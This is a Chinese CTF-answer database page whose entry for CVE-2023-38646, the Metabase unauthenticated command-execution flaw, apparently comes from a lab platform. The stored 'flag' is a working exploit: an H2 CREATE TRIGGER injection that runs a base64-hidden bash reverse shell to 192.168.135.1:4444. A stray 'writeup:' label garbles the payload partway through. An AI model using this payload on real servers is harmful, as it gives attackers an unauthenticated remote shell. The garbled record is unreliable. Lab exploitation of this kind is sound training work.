[随波逐流]CTF Flags

随波逐流信息安全网 www.1o1o.xyz

   [随波逐流]CTF Flags

软件版本:v1.0.0   数据版本: v20260526
返    回

CVE-2023-38646

 广告模块
ID: 14437
标题: CVE-2023-38646
描述: Metabase,一款流行的商业智能和数据可视化工具,被发现存在严重的安全漏洞,即CVE-2023-38646,允许攻击者在无需身份验证的情况下执行服务器级命令。
类型: WEB
网站: 春秋云境
题目链接: https://yunjing.ichunqiu.com/cvefree
赛事: 春秋云境
年度: None
Flag值: CREATE TRIGGER hhh BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS '//javascript java.lang.Runtime.getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEzNS4xLzQ0NDQgMD4mMQ==}
writeup: {base64,-d}
{bash,-i}")'
https://blog.csdn.net/m0_46699477/article/details/131985102
答案错误,我要更正